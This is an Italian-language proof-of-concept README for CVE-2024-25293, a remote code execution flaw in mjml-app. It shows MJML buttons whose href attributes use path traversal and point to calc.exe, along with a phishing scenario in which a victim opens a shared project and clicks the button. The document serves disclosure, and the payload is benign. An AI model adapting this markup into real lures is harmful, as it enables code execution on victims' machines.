
mjml-app v3.0.4 & 3.1.0-beta exploit RCE
Una Proof-of-Concept per la vulnerabilità CVE-2024-25293.
È stato scoperto che mjml-app v3.0.4 e 3.1.0-beta presentano una vulnerabilità di remote code execution (RCE).
In questo repository è presente un esempio di applicazione vulnerabile e un exploit proof-of-concept (POC) della stessa.

Passo 1) L'attaccante crea un 'mj-button' con un tag 'href' e
<mjml>
<mj-body>
<mj-section>
<mj-column>
<mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
<mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
</mj-column>
</mj-section>
</mj-body>
</mjml>

Passo 2) L'attaccante crea il progetto di phishing principale con il seguente codice.
<!-- header.mjml -->
<mj-section>
<mj-column>
<mj-text>This is a demo jruru</mj-text>
</mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

Passo 3) La vittima apre il progetto condiviso e fa clic sul pulsante, attivando l'esecuzione del payload (ad es. calc, notepad)

Eseguire file exe tramite tag href all'interno di un'applicazione è rischioso, ed eseguire file in combinazione con Path Traversal rappresenta un problema di sicurezza. Ciò consente di creare e distribuire progetti di phishing per eseguire file locali. Pertanto, è essenziale modificare questa funzionalità per impedire tale esecuzione.